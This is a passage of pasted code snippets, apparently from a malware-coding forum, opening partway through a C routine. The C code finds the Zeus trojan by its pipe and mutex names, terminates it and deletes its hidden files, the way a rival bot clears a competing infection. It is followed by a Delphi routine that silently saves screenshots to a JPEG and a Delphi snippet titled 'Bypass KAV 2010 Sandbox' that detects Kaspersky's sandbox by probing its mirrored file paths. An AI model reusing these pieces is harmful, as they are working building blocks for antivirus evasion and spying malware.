                free((PVOID)temp); CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc);
                continue;
            }
            if ( (temp) && lstrlenW((LPCWSTR)temp) < (int)dwOutLn)
            {
                RtlZeroMemory(lpOut, dwOutLn);
                WideCharToMultiByte(CP_ACP, 0, (PWCHAR)temp, lstrlenW((LPCWSTR)temp), (LPSTR)lpOut, dwOutLn, NULL, NULL);
            }
            if (lpMutex)
            {
                // mutex name = last path component of the pipe object name
                LPWSTR lpwMutexName = obn->Name.Buffer;
                LPWSTR lpwTemp;
                while (lpwTemp = StrStrW(lpwMutexName, L"\\"))
                {
                    lpwMutexName = lpwTemp + 1;
                }
                RtlZeroMemory(lpMutex, dwMutexLn);
                WideCharToMultiByte(CP_ACP, 0, lpwMutexName, lstrlenW(lpwMutexName), (LPSTR)lpMutex, dwMutexLn, NULL, NULL);
            }
            free((PVOID)temp);
            CloseHandle(hFile);
        }
        free(obn);
        NtClose(thandle);
        NtClose(proc);
    }
    free(shi);
}

BOOL DeleteHiddenFile(PCHAR szPath)
{
    SetFileAttributes(szPath, FILE_ATTRIBUTE_ARCHIVE);
    return DeleteFile(szPath);
}

#define ZEUS_FASTCLEAN

BOOL KillZeus()
{
    // Getting info
    CHAR szMutexName[MAX_PATH] = {0};
    CHAR szZeusPath[MAX_PATH];
    GetZeusInfo(11, szZeusPath, sizeof szZeusPath, szMutexName, sizeof szMutexName);
    if (!strlen(szMutexName))
    {
#ifdef _DEBUGLITE
        OutputDebugStringEx(__FUNCTION__" : ERROR : Cannot get szMutexName");
#endif
        return FALSE;
    }
#ifndef ZEUS_FASTCLEAN
    CHAR szZeusConfig[MAX_PATH];
    GetZeusInfo(12, szZeusConfig, sizeof szZeusConfig, NULL, NULL);
    CHAR szZeusLog[MAX_PATH];
    GetZeusInfo(13, szZeusLog, sizeof szZeusLog, NULL, NULL);
#endif
#ifdef _DEBUGLITE
    OutputDebugStringEx(__FUNCTION__" : INFO : 0.) Mutex \"%s\"", szMutexName);
    OutputDebugStringEx(__FUNCTION__" : INFO : 1.) Path \"%s\"", szZeusPath);
#ifndef ZEUS_FASTCLEAN
    OutputDebugStringEx(__FUNCTION__" : INFO : 2.) Config \"%s\"", szZeusConfig);
    OutputDebugStringEx(__FUNCTION__" : INFO : 3.) Log \"%s\"", szZeusLog);
#endif
#endif
    // Killing
    GetZeusInfo(3, NULL, NULL, NULL, NULL);
    // Waiting: the bot is gone once its mutex can no longer be opened
    HANDLE hMutex;
    for (INT i = 0; i < 10; i++)
    {
        hMutex = OpenMutex(MUTANT_QUERY_STATE|SYNCHRONIZE|STANDARD_RIGHTS_REQUIRED, FALSE, szMutexName);
        if (!hMutex) break;
        CloseHandle(hMutex);
        Sleep(1000);
    }
    if (hMutex)
    {
#ifdef _DEBUGLITE
        OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active");
#endif
        return FALSE;
    }
    // Deleting files
    if (!DeleteHiddenFile(szZeusPath))
    {
#ifdef _DEBUGLITE
        OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusPath);
#endif
    }
#ifndef ZEUS_FASTCLEAN
    if (!DeleteHiddenFile(szZeusConfig))
    {
#ifdef _DEBUGLITE
        OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusConfig);
#endif
    }
    if (!DeleteHiddenFile(szZeusLog))
    {
#ifdef _DEBUGLITE
        OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusLog);
#endif
    }
#endif
#ifdef _DEBUGLITE
    OutputDebugStringEx(__FUNCTION__" : INFO : EXIT");
#endif
    return TRUE;
}
-
[Delphi] Screen Capture with parameters
Author: zoom (I think)

program ScreenShot;

uses
  Windows, Graphics, Jpeg;

// Captures the whole screen, scales it to Percent of its size and saves it
// as a JPEG with the given compression Quality (0..100).
procedure ScreenToFile(FileName: string; Quality: Word; Percent: Word);
var
  Bmp: TBitmap;
  Jpg: TJpegImage;
  ScreenDC: HDC;
  ScreenW, ScreenH: Integer;
begin
  Bmp := TBitmap.Create;
  Jpg := TJpegImage.Create;
  ScreenDC := GetDC(0);  // one screen DC for the whole capture, released below
  try
    ScreenW := GetDeviceCaps(ScreenDC, HORZRES);
    ScreenH := GetDeviceCaps(ScreenDC, VERTRES);
    Bmp.Width := ScreenW * Percent div 100;
    Bmp.Height := ScreenH * Percent div 100;
    SetStretchBltMode(Bmp.Canvas.Handle, HALFTONE);
    StretchBlt(Bmp.Canvas.Handle, 0, 0, Bmp.Width, Bmp.Height,
               ScreenDC, 0, 0, ScreenW, ScreenH, SRCCOPY);
    Jpg.Assign(Bmp);
    Jpg.CompressionQuality := Quality;
    Jpg.SaveToFile(FileName);
  finally
    ReleaseDC(0, ScreenDC);
    Jpg.Free;
    Bmp.Free;
  end;
end;

begin
  ScreenToFile('SHOT.JPG', 50, 70);
end.
-
[Delphi] Bypass KAV 2010 Sandbox
Author: chaincoder

program KAV;

uses
  Windows, SysUtils;

// Writes a small marker file at NewDropPath.
procedure Save(NewDropPath: string);
var
  F: file;
  BufferString: string;
begin
  AssignFile(F, NewDropPath);
  Rewrite(F, 1);
  BufferString := '555555555555555555555555555';
  if (IOResult = 0) then
  begin
    BlockWrite(F, BufferString[1], Length(BufferString));
    CloseFile(F);
  end;
end;

// Expands an environment variable such as APPDATA.
function TranslateMacro(Macro: string): string;
var
  Size: Cardinal;
  Output: array[0..MAX_PATH] of Char;
begin
  Result := '';
  FillChar(Output, SizeOf(Output), #0);
  Size := SizeOf(Output);
  Size := GetEnvironmentVariable(PChar(Macro), Output, Size);
  if (Size > 0) then
    Result := Output;
end;

var
  Dat: string;
  Kis: string;
  App: string;
  i: Integer;
  Found: Boolean;

begin
  Dat := TranslateMacro('APPDATA');
  Delete(Dat, 1, 2);  // drop the drive letter ("C:") so Dat is the path below the volume
  // remove any marker left by an earlier run in the sandbox's mirrored tree
  for i := 0 to 100 do
  begin
    Kis := TranslateMacro('ALLUSERSPROFILE') + '\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume' + IntToStr(i) + Dat + '\1.TXT';
    DeleteFile(Kis);
  end;
  for i := 0 to 100 do
  begin
    Kis := TranslateMacro('ALLUSERSPROFILE') + '\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume' + IntToStr(i) + Dat + '\1.TXT';
    DeleteFile(Kis);
  end;
  // write the marker into %APPDATA%; if the process is sandboxed, the write
  // lands in the mirrored tree instead and the checks below find it there
  App := TranslateMacro('APPDATA') + '\1.txt';
  Save(App);
  Found := False;
  for i := 0 to 100 do
  begin
    Kis := TranslateMacro('ALLUSERSPROFILE') + '\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume' + IntToStr(i) + Dat + '\1.TXT';
    if FileExists(Kis) then
    begin
      Found := True;
      Break;
    end;
  end;
  for i := 0 to 100 do
  begin
    Kis := TranslateMacro('ALLUSERSPROFILE') + '\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume' + IntToStr(i) + Dat + '\1.TXT';
    if FileExists(Kis) then
    begin
      Found := True;
      Break;
    end;
  end;
  // DeleteFile(Win);
  if Found then
    MessageBox(0, PChar('RUNNING INSIDE KAV'), 'STATUS', 0)
  else
    MessageBox(0, PChar('NOT RUNNING INSIDE KAV'), 'STATUS', 0);
end.